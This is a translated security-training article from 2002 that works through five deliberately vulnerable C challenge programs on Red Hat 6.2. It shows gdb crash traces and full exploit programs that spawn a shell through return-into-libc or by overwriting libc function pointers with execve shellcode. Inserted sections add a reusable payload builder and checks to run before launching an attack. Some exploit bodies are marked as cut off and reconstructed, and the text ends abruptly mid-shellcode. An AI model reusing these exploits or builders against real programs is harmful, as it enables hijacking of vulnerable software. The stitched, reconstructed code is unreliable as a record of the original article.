[Analysis] Insecure Programming Demonstration: Advanced Chapter



Created: 2002-01-17
Type: original article
Source: http://www.xfocus.org/
Submitted by: alert7 (sztcww_at_sina.com)

Insecure Programming Demonstration: Advanced Chapter
by alert7
Home page: http://www.xfocus.org/  http://www.whitecell.org/
Company: Huatai Net An
Date: 2002-1-17

★ ★ Part Three: Advanced

Test environment: Redhat 6.2, glibc 2.1.3

★ 3.1 Demonstration One

/* e1.c                                                     *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* jumpy vfprintf, batman! */

#include <stdio.h>

int main(int argv, char **argc) {
    /* can you do it changing the stack? */
    /* can you do it without changing it? */
    printf(argc[1]);
    while (1);
}

Refer to << Using a format string to overwrite the return address of the *printf() function itself >>.

★ 3.2 Demonstration Two

/* e2.c                                                     *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* Now, your mission is to make abo1 act like this other program:
 *
 *   char buf[100];
 *   while (1) {
 *      scanf("%100s", buf);
 *      system(buf);
 *   }
 *
 * but, you cannot execute code in stack.
 */

#include <string.h>

int main(int argv, char **argc) {
    char buf[256];

    strcpy(buf, argc[1]);
}

The only condition that has to be met is that the stack is not executable.

[alert7@redhat62 alert7]$ ./e2 `perl -e 'print "a"x264'`
Segmentation fault (core dumped)
[alert7@redhat62 alert7]$ gdb e2 core -q
Core was generated by `./e2 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0x61616161 in ?? ()

/* exp_e2.c
 * alert7 exploit for e2
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>

#define RET_POSITION 260
#define NOP 0x90
#define BUFADDR 0xbffff968
#define SYSTEM 0x4005ae0

char shell[] = "/bin/sh";           /* .string "/bin/sh" */

int main(int argc, char **argv)
{
    char buff[1024], *ptr;
    int retaddr;
    int i;

    retaddr = SYSTEM;
    if (argc > 1)
        retaddr = SYSTEM + atoi(argv[1]);

    bzero(buff, 1024);
    for (i = 0; i < 300; i++)
        buff[i] = NOP;

    /* saved EBP of main(): pointed back into the buffer */
    *((long *)&(buff[RET_POSITION - 4])) = BUFADDR + 4 * 3 + strlen(shell);
    /* EIP: main() returns into system() */
    *((long *)&(buff[RET_POSITION])) = retaddr;
    /* EIP1: where system() returns to */
    *((long *)&(buff[RET_POSITION + 4])) = 0xaabbccdd;
    /* system()'s argument: pointer to the "/bin/sh" placed right after it */
    *((long *)&(buff[RET_POSITION + 8])) = BUFADDR + RET_POSITION + 4 * 3;
    ptr = buff + RET_POSITION + 12;
    strcpy(ptr, shell);

    printf("jump to 0x%08x\n", retaddr);
    execl("./e2", "e2", buff, (char *)0);
    return 0;
}

[alert7@redhat]$ gcc -o exp_e2 exp_e2.c
[alert7@redhat]$ ./exp_e2
jump to 0x4005ae0
bash$ id
uid=501(alert7) gid=501(alert7) groups=501(alert7)
bash$ exit
exit
Segmentation fault (core dumped)

Memory growth direction ------>

| xxxxxx    | EBP | EIP | EIP1 | parameter pointer | /bin/sh |
| 260 bytes |     |     |      |                   |         |
                         ^
                         after main's ret, ESP points here; EBP holds the value we supplied

EIP is the address of system(). EIP1 is the address that system() returns to afterwards (if system() returns at all), and the parameter pointer points to /bin/sh. Here we set EIP1 to 0xaabbccdd, so when /bin/sh exits, execution returns to 0xaabbccdd and the process core dumps. In other words, as long as we lay the frames out carefully we can build a chain of function calls, for example setuid(0) -> system("/bin/sh") -> exit(0). This exploit succeeds largely because the address of system() contains no zero byte, that is, the non-executable stack patch (which mmaps shared libraries into low memory, where every address starts with a 0x00 byte) is not installed.
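The frame in the diagram above, as an added example that is not code from the article: a builder for the same [pad][EBP][&system][EIP1][&cmd][cmd] layout, plus the check a practitioner runs before firing it. Because the victim copies the payload with strcpy(), every byte up to the command string must be non-zero, otherwise the chain is delivered only up to the first NUL. Only ret_pos 260 and BUFADDR 0xbffff968 come from exp_e2.c; the two libc addresses in build_demo() are placeholders chosen to be zero-free.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90

/* Little-endian 32-bit store/load: the words we write are x86 stack slots. */
void put32(uint8_t *p, uint32_t v)
{
    p[0] = v & 0xff;         p[1] = (v >> 8) & 0xff;
    p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

uint32_t get32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Lay out the frame (memory grows to the right):
 *
 *   | NOP x (ret_pos-4) | EBP | &system | EIP1 | &cmd | cmd\0 |
 *
 * bufaddr is where the victim's buffer starts, so the argument pointer is
 * bufaddr + ret_pos + 12.  Saved EBP is pointed back into the buffer, as
 * exp_e2.c does; system() sets up its own frame and never relies on it.
 * Returns the payload length without the terminating NUL, or 0 when it
 * does not fit or ret_pos < 4. */
size_t build_ret2libc(uint8_t *out, size_t outlen, size_t ret_pos,
                      uint32_t bufaddr, uint32_t system_addr,
                      uint32_t eip1, const char *cmd)
{
    size_t cmdlen = strlen(cmd);
    size_t total = ret_pos + 12 + cmdlen;

    if (ret_pos < 4 || total + 1 > outlen)
        return 0;
    memset(out, NOP, ret_pos - 4);
    put32(out + ret_pos - 4, bufaddr);                          /* saved EBP */
    put32(out + ret_pos,     system_addr);                      /* EIP: into system() */
    put32(out + ret_pos + 4, eip1);                             /* EIP1: system()'s return */
    put32(out + ret_pos + 8, bufaddr + (uint32_t)ret_pos + 12); /* arg: &cmd */
    memcpy(out + ret_pos + 12, cmd, cmdlen + 1);                /* cmd and its NUL */
    return total;
}

/* strcpy() delivers bytes only up to the first NUL, so every byte before
 * the command string must be non-zero or the chain is cut short.  Returns
 * the offset of the first NUL within the first `upto` bytes, or -1. */
long first_nul(const uint8_t *p, size_t upto)
{
    for (size_t i = 0; i < upto; i++)
        if (p[i] == 0)
            return (long)i;
    return -1;
}

uint8_t payload[1024];

/* Constructed demo: e2's layout (ret_pos 260, BUFADDR 0xbffff968) with
 * placeholder libc addresses that contain no zero byte.  Returns the
 * payload length. */
size_t build_demo(void)
{
    return build_ret2libc(payload, sizeof payload, 260, 0xbffff968,
                          0x400a1b2c /* &system, placeholder */,
                          0x400d3e4f /* EIP1, placeholder */, "/bin/sh");
}

int main(void)
{
    size_t n = build_demo();
    printf("payload %zu bytes, EIP=0x%08x EIP1=0x%08x arg=0x%08x, first NUL at %ld\n",
           n, (unsigned)get32(payload + 260), (unsigned)get32(payload + 264),
           (unsigned)get32(payload + 268), first_nul(payload, 272));
    return 0;
}
```

Passing an address that does contain a zero byte, for instance 0x40005ae0, makes first_nul() report offset 262: strcpy() would stop two bytes into the return address, which is exactly why the text stresses that system() must sit at a zero-free address.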

For more background, refer to << Bypassing Linux Non-Executable Stack Protection >> by warning3 and "The advanced return-into-lib(c) exploits" by Nergal in Phrack 58.

★ 3.3 Demonstration Three

/* e3.c                                                     *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* Are you an environmental threat? */

#include <stdlib.h>
#include <string.h>

char buf[256];

int main(int argv, char **argc) {
    strcpy(buf, argc[1]);
    setenv("ABO", argc[2], 1);
    while (1);
}

[alert7@redhat]$ uname -a
Linux redhat 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
[alert7@redhat]$ gcc -o e3 e3.c -static     // compiled statically: the situation below only arises with static linking
[alert7@redhat]$ ./e3 `perl -e 'print "a"x267'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e3 core -q
Core was generated by `./e3 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x616161 in ?? ()
(gdb) quit
[alert7@redhat]$ ./e3 `perl -e 'print "a"x268'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e3 core -q
Core was generated by `./e3 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x61616161 in ?? ()
(gdb) bt
#0  0x61616161 in ?? ()
#1  0x804ac85 in __libc_realloc (oldmem=0x0, bytes=88) at malloc.c:3209
#2  0x804d18b in realloc_hook_ini (ptr=0x0, sz=88, caller=0x804857c) at malloc.c:1770
#3  0x804abb3 in __libc_realloc (oldmem=0x0, bytes=88) at malloc.c:3196
#4  0x804857c in __add_to_environ (name=0x80718e8 "ABO", value=0xbffffcc8 "a", combined=0x0, replace=1) at ../sysdeps/generic/setenv.c:145
#5  0x804882b in __setenv (name=0x80718e8 "ABO", value=0xbffffcc8 "a", replace=1) at ../sysdeps/generic/setenv.c:263
#6  0x80481ce in main ()
#7  0x804831b in __libc_start_main (main=0x80481a0 <main>, argc=3, argv=0xbffffb24, init=0x80480b4 <_init>, fini=0x80718ac <_fini>, rtld_fini=0, stack_end=0xbffffb1c) at ../sysdeps/generic/libc-start.c:92

Given the above, we do not need to care about what happens inside setenv() at all. It is enough to know that the value placed at buf+264 becomes EIP.

/* exp_e3.c
 * alert7 exploit for static e3
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>

#define RET_POSITION 264
#define NOP 0x90
#define BUFADDR 0x807bf60       // address of buf in e3 (use 0xaabbccdd to test the hijack)

char shellcode[] =
    "\xeb\x1f"                  /* jmp 0x1f */
    "\x5e"                      /* popl %esi */
    "\x89\x76\x08"              /* movl %esi,0x8(%esi) */
    "\x31\xc0"                  /* xorl %eax,%eax */
    "\x88\x46\x07"              /* movb %eax,0x7(%esi) */
    "\x89\x46\x0c"              /* movl %eax,0xc(%esi) */
    "\xb0\x0b"                  /* movb $0xb,%al */
    "\x89\xf3"                  /* movl %esi,%ebx */
    "\x8d\x4e\x08"              /* leal 0x8(%esi),%ecx */
    "\x8d\x56\x0c"              /* leal 0xc(%esi),%edx */
    "\xcd\x80"                  /* int $0x80 */
    "\x31\xdb"                  /* xorl %ebx,%ebx */
    "\x89\xd8"                  /* movl %ebx,%eax */
    "\x40"                      /* inc %eax */
    "\xcd\x80"                  /* int $0x80 */
    "\xe8\xdc\xff\xff\xff"      /* call -0x24 */
    "/bin/sh";                  /* .string "/bin/sh" */

int main(int argc, char **argv)
{
    char buff[1024], *ptr;
    int retaddr;
    int i;

    retaddr = BUFADDR;
    if (argc > 1)
        retaddr = BUFADDR + atoi(argv[1]);

    bzero(buff, 1024);
    /* every word of the payload is the return address, so whichever
     * overwritten pointer libc uses first lands in the NOP sled ... */
    for (i = 0; i < 1024; i += 4)
        *((long *)&(buff[i])) = retaddr;
    /* ... which, together with the shellcode, sits at the front */
    for (i = 0; i < 100; i++)
        buff[i] = NOP;
    ptr = buff + 50;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    /* the rest of exp_e3.c is cut off in this copy; the tail below follows exp_e2.c */
    buff[1023] = 0;
    printf("jump to 0x%08x\n", retaddr);
    execl("./e3", "e3", buff, "a", (char *)0);
    return 0;
}

After tracing for a long time I found that the culprit is the __libc_malloc() of the static build:

0x8049ff5 <__libc_malloc+89>:   mov    0x807c068,%eax
0x8049ffa <__libc_malloc+94>:   test   %eax,%eax
0x8049ffc <__libc_malloc+96>:   je     0x804a010 <__libc_malloc+116>
0x8049ffe <__libc_malloc+98>:   push   $0x0
0x804a000 <__libc_malloc+100>:  call   *%eax
(gdb) i reg eax
eax            0x61616161       1633771873
(gdb) x 0x807c068
0x807c068 <__libc_internal_tsd_get>:    0x61616161
(gdb) p &__libc_internal_tsd_get
$1 = (void *(**)()) 0x807c068
(gdb) p __libc_internal_tsd_get
$2 = (void *(*)()) 0x61616161

Our data overwrote the function pointer __libc_internal_tsd_get, so __libc_internal_tsd_get() now points to 0x61616161 and the indirect call faults. I do not know what __libc_internal_tsd_get() is for here, which is frustrating. (It is glibc's hook for thread-specific data: when the pointer is non-NULL, malloc calls it with key 0, _LIBC_TSD_KEY_MALLOC, the `push $0x0` above, to look up the calling thread's arena. In this non-threaded static binary the pointer is NULL, the `je` is taken and the call is never made; the overflow makes it non-NULL and supplies the target. As a check: 0x807c068 - 0x807bf60 = 0x108 = 264, the RET_POSITION used by exp_e3.c.)

★ 3.4 Demonstration Four

/* e4.c                                                     *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* % What the hell? */

#include <stdio.h>
#include <string.h>

char buf[256];

int main(int argv, char **argc) {
    strcpy(buf, argc[1]);
    printf("Live at 100%!");
    while (1);
}

[alert7@redhat]$ gcc -o e4 e4.c -static     // compiled statically: again this only appears with static linking
[alert7@redhat]$ ./e4 `perl -e 'print "a"x1408'`
[alert7@redhat]$ ./e4 `perl -e 'print "a"x1409'`
Segmentation fault (core dumped)
[alert7@redhat]$ gdb -q e4 core
Core was generated by `./e4 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x61616161 in ?? ()
(gdb) bt
#0  0x61616161 in ?? ()
#1  0x8048681 in printf (format=0x8071548 "Live at 100%!") at printf.c:31
#2  0x80481c3 in main ()
#3  0x804831b in __libc_start_main (main=0x80481a0 <main>, argc=2, argv=0xbffff6a4, init=0x80480b4 <_init>, fini=0x807150c <_fini>, rtld_fini=0, stack_end=0xbffff69c) at ../sysdeps/generic/libc-start.c:92
[alert7@redhat62 alert7]$ ./e4 `perl -e 'print "a"x518'``perl -e 'print "b"x891'`
Segmentation fault (core dumped)
[alert7@redhat62 alert7]$ gdb e4 core -q
Core was generated by `./e4 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x62626161 in ?? ()
[alert7@redhat62 alert7]$ ./e4 `perl -e 'print "a"x516'``perl -e 'print "b"x893'`
Segmentation fault (core dumped)
[alert7@redhat62 alert7]$ gdb e4 core -q
Core was generated by `./e4 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x62626262 in ?? ()

Given the above, we do not need to care about what happens inside printf() at all. It is enough to know that the value placed at buf+516 becomes EIP. Note that both probes overflow 1409 bytes in total and that 1408 bytes do not fault: the payload has to reach buf+1408 as well, which exp_e4.c does by padding with 2000 NOPs.

/* exp_e4.c
 * alert7 exploit for static e4
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>

#define RET_POSITION 516
#define NOP 0x90
#define BUFADDR 0x807bbc0       // address of buf in e4 (use 0xaabbccdd to test the hijack)

char shellcode[] =
    "\xeb\x1f"                  /* jmp 0x1f */
    "\x5e"                      /* popl %esi */
    "\x89\x76\x08"              /* movl %esi,0x8(%esi) */
    "\x31\xc0"                  /* xorl %eax,%eax */
    "\x88\x46\x07"              /* movb %eax,0x7(%esi) */
    "\x89\x46\x0c"              /* movl %eax,0xc(%esi) */
    "\xb0\x0b"                  /* movb $0xb,%al */
    "\x89\xf3"                  /* movl %esi,%ebx */
    "\x8d\x4e\x08"              /* leal 0x8(%esi),%ecx */
    "\x8d\x56\x0c"              /* leal 0xc(%esi),%edx */
    "\xcd\x80"                  /* int $0x80 */
    "\x31\xdb"                  /* xorl %ebx,%ebx */
    "\x89\xd8"                  /* movl %ebx,%eax */
    "\x40"                      /* inc %eax */
    "\xcd\x80"                  /* int $0x80 */
    "\xe8\xdc\xff\xff\xff"      /* call -0x24 */
    "/bin/sh";                  /* .string "/bin/sh" */

int main(int argc, char **argv)
{
    char buff[2048], *ptr;
    int retaddr;
    int i;

    retaddr = BUFADDR;
    if (argc > 1)
        retaddr = BUFADDR + atoi(argv[1]);

    bzero(buff, 2048);
    for (i = 0; i < 2000; i++)
        buff[i] = NOP;
    *((long *)&(buff[RET_POSITION])) = retaddr;
    ptr = buff + 50;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    /* the rest of exp_e4.c is cut off in this copy; the tail below follows exp_e2.c */
    printf("jump to 0x%08x\n", retaddr);
    execl("./e4", "e4", buff, (char *)0);
    return 0;
}

The faulting spot is inside _IO_vfprintf:

                                mov    0x807bd40(,%edx,4),%edx
0x8050108 <_IO_vfprintf+9368>:  test   %edx,%edx          // here %edx = 0x62626262
0x805010a <_IO_vfprintf+9370>:  je     0x8050130 <_IO_vfprintf+9408>
0x805010c <_IO_vfprintf+9372>:  add    $0x28,%eax
0x805010f <_IO_vfprintf+9375>:  push   %eax
0x8050110 <_IO_vfprintf+9376>:  push   $0x1
0x8050112 <_IO_vfprintf+9378>:  mov    0xfffffab4(%ebp),%ecx
0x8050118 <_IO_vfprintf+9384>:  push   %ecx
0x8050119 <_IO_vfprintf+9385>:  call   *%edx              // the problem is here
(gdb) x 0x807bd40
0x807bd40 <__printf_arginfo_table>:     0x61616161

As soon as printf("%X") is called with an X that printf does not recognise as one of its own conversions, it treats X as a user-registered conversion and looks it up in __printf_arginfo_table to call the function that interprets the format. The __printf_arginfo_table array has been overwritten by our data, so we get control. This is my rough understanding; the exact execution path inside printf() still needs a detailed analysis, and corrections are welcome. As a check with the numbers above: the conversion character in "Live at 100%!" is '!' (0x21 = 33), and 0x807bd40 + 33 * 4 = 0x807bdc4 = 0x807bbc0 + 516, which is exactly RET_POSITION.

★ 3.5 Demonstration Five

/* e5.c                                                     *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* is this possible? */

#include <stdio.h>
#include <string.h>

char buf[256];

int main(int argv, char **argc) {
    strcpy(buf, argc[1]);
    perror(argc[2]);
    while (1);
}

Compiled statically:

[alert7@redhat]$ gcc -o e5 e5.c -static
(gdb) p &buf
$1 = (char (*)[256]) 0x807bc00
[alert7@redhat]$ ./e5 `perl -e 'print "a"x255'` a
a: Success
[alert7@redhat]$ ./e5 `perl -e 'print "a"x256'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  chunk_alloc (ar_ptr=0x807a000, nb=48) at malloc.c:2762
2762    malloc.c: No such file or directory.
(gdb) bt
#0  chunk_alloc (ar_ptr=0x807a000, nb=48) at malloc.c:2762
#1  0x8049cf4 in __libc_malloc (bytes=44) at malloc.c:2696
#2  0x804e74a in _nl_make_l10nflist (l10nfile_list=0x807b434, dirlist=0x8071795 "/usr/share/locale", dirlist_len=18, mask=0, language=0xbffff628 "en_US", territory=0x0, codeset=0x0, normalized_codeset=0x0, modifier=0x0, special=0x0, sponsor=0x0, revision=0x0, filename=0xbffff630 "LC_MESSAGES/libc.mo", do_allocate=0) at l10nflist.c:201
#3  0x804dd30 in _nl_find_domain (dirname=0x8071795 "/usr/share/locale", locale=0xbffff628 "en_US", domainname=0xbffff630 "LC_MESSAGES/libc.mo") at finddomain.c:113
#4  0x804d8b0 in __dcgettext (domainname=0x8071786 "libc", msgid=0x80727d4 "Success", category=5) at dcgettext.c:395
#5  0x804d06d in __strerror_r (errnum=0, buf=0xbffff6cc "", buflen=1024) at ../sysdeps/generic/_strerror.c:68
#6  0x80486ae in perror (s=0xbffffcc8 "a") at perror.c:38
#7  0x80481c7 in main ()
#8  0x804831b in __libc_start_main (main=0x80481a0 <main>, argc=3, argv=0xbffffb24, init=0x80480b4 <_init>, fini=0x807155c <_fini>, rtld_fini=0, stack_end=0xbffffb1c) at ../sysdeps/generic/libc-start.c:92
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x257'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  chunk_alloc (ar_ptr=0x8070061, nb=48) at malloc.c:2762
2762    malloc.c: No such file or directory.
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x258'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  chunk_alloc (ar_ptr=0x8006161, nb=48) at malloc.c:2752
2752    malloc.c: No such file or directory.
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x259'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  chunk_alloc (ar_ptr=0x616161, nb=48) at malloc.c:2752
2752    malloc.c: No such file or directory.
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x260'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  chunk_alloc (ar_ptr=0x61616161, nb=48) at malloc.c:2752
2752    malloc.c: No such file or directory.

From ./e5 `perl -e 'print "a"x260'` a through ./e5 `perl -e 'print "a"x264'` a the result is the same as above.

[alert7@redhat]$ ./e5 `perl -e 'print "a"x265'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x61 in ?? ()
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x266'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x6161 in ?? ()
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x267'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x616161 in ?? ()
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x268'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x61616161 in ?? ()
(gdb) bt
#0  0x61616161 in ?? ()
#1  0x804e74a in _nl_make_l10nflist (l10nfile_list=0x807b434, dirlist=0x8071795 "/usr/share/locale", dirlist_len=18, mask=0, language=0xbffff628 "en_US", territory=0x0, codeset=0x0, normalized_codeset=0x0, modifier=0x0, special=0x0, sponsor=0x0, revision=0x0, filename=0xbffff630 "LC_MESSAGES/libc.mo", do_allocate=0) at l10nflist.c:201
#2  0x804dd30 in _nl_find_domain (dirname=0x8071795 "/usr/share/locale", locale=0xbffff628 "en_US", domainname=0xbffff630 "LC_MESSAGES/libc.mo") at finddomain.c:113
#3  0x804d8b0 in __dcgettext (domainname=0x8071786 "libc", msgid=0x80727d4 "Success", category=5) at dcgettext.c:395
#4  0x804d06d in __strerror_r (errnum=0, buf=0xbffff6cc "", buflen=1024) at ../sysdeps/generic/_strerror.c:68
#5  0x80486ae in perror (s=0xbffffcc8 "a") at perror.c:38
#6  0x80481c7 in main ()
#7  0x804831b in __libc_start_main (main=0x80481a0 <main>, argc=3, argv=0xbffffb24, init=0x80480b4 <_init>, fini=0x807155c <_fini>, rtld_fini=0, stack_end=0xbffffb1c) at ../sysdeps/generic/libc-start.c:92

From ./e5 `perl -e 'print "a"x268'` a through ./e5 `perl -e 'print "a"x364'` a the result is the same.

[alert7@redhat]$ ./e5 `perl -e 'print "a"x365'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x804d683 in __dcgettext (domainname=0x8071786 "libc", msgid=0x80727d4 "Success", category=5) at dcgettext.c:282
282     dcgettext.c: No such file or directory.
(gdb) x/i 0x804d683
0x804d683 <__dcgettext+67>:     pushl  0x4(%eax)
(gdb) i reg eax
eax            0x61     97
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x368'` a      // same as before
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x804d683 in __dcgettext (domainname=0x8071786 "libc", msgid=0x80727d4 "Success", category=5) at dcgettext.c:282
282     dcgettext.c: No such file or directory.
(gdb) x/i 0x804d683
0x804d683 <__dcgettext+67>:     pushl  0x4(%eax)
(gdb) i reg eax
eax            0x61616161       1633771873
(gdb) bt
#0  0x804d683 in __dcgettext (domainname=0x8071786 "libc", msgid=0x80727d4 "Success", category=5) at dcgettext.c:282
#1  0x804d06d in __strerror_r (errnum=0, buf=0xbffff65c "", buflen=1024) at ../sysdeps/generic/_strerror.c:68
#2  0x80486ae in perror (s=0xbffffcc8 "a") at perror.c:38
#3  0x80481c7 in main ()
#4  0x804831b in __libc_start_main (main=0x80481a0 <main>, argc=3, argv=0xbffffab4, init=0x80480b4 <_init>, fini=0x807155c <_fini>, rtld_fini=0, stack_end=0xbffffaac) at ../sysdeps/generic/libc-start.c:92

So the length of argv[1] is limited to the range 268 -- 364 (beyond 364 the pointer that __dcgettext dereferences at dcgettext.c:282 is destroyed before the hijacked call is ever reached), and the word at buf+264 is EIP.

/* exp_e5.c
 * alert7 exploit for static e5
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>

#define RET_POSITION 264
#define NOP 0x90
#define BUFADDR 0x807bc00       // address of buf in e5 (use 0xaabbccdd to test the hijack)

char shellcode[] =
    "\xeb\x1f"                  /* jmp 0x1f */
    "\x5e"                      /* popl %esi */
    "\x89\x76\x08"              /* movl %esi,0x8(%esi) */
    "\x31\xc0"                  /* xorl %eax,%eax */
    "\x88\x46\x07"              /* movb %eax,0x7(%esi) */
    "\x89\x46\x0c"              /* movl %eax,0xc(%esi) */
    "\xb0\x0b"                  /* movb $0xb,%al */
    "\x89\xf3"                  /* movl %esi,%ebx */
    "\x8d\x4e\x08"              /* leal 0x8(%esi),%ecx */
    "\x8d\x56\x0c"              /* leal 0xc(%esi),%edx */
    "\xcd\x80"                  /* int $0x80 */
    "\x31\xdb"                  /* xorl %ebx,%ebx */
    "\x89\xd8"                  /* movl %ebx,%eax */
    "\x40"                      /* inc %eax */
    "\xcd\x80"                  /* int $0x80 */
    "\xe8\xdc\xff\xff\xff"      /* call -0x24 */
    "/bin/sh";                  /* .string "/bin/sh" */

int main(int argc, char **argv)
{
    char buff[300], *ptr;
    /* everything after this declaration is cut off in this copy; the body
     * below follows exp_e3.c and keeps the overflow within 268..364 bytes */
    int retaddr;
    int i;

    retaddr = BUFADDR;
    if (argc > 1)
        retaddr = BUFADDR + atoi(argv[1]);

    bzero(buff, 300);
    for (i = 0; i < 296; i += 4)
        *((long *)&(buff[i])) = retaddr;
    for (i = 0; i < 100; i++)
        buff[i] = NOP;
    ptr = buff + 50;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    printf("jump to 0x%08x\n", retaddr);
    execl("./e5", "e5", buff, "a", (char *)0);
    return 0;
}
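The three static-binary exploits above (exp_e3.c, exp_e4.c and exp_e5.c) share one strategy: a global buffer in .bss is followed, at a fixed distance, by a libc function pointer or table, so the overflow writes the same pointer into every word from the buffer onward and puts a NOP sled plus the shellcode at the front. What follows is an added example, not code from the article, that packages that strategy together with the checks worth running before launching it: deriving RET_POSITION from the addresses gdb printed, keeping the sled and shellcode clear of the hijacked slot, confirming the pointer lands in the sled, and confirming strcpy() will deliver the whole thing. The addresses used below are the ones shown on this page (buf, __libc_internal_tsd_get, __printf_arginfo_table); the function names are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90

/* The 45-byte execve("/bin/sh") shellcode quoted in exp_e3/e4/e5 above. */
static const uint8_t shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
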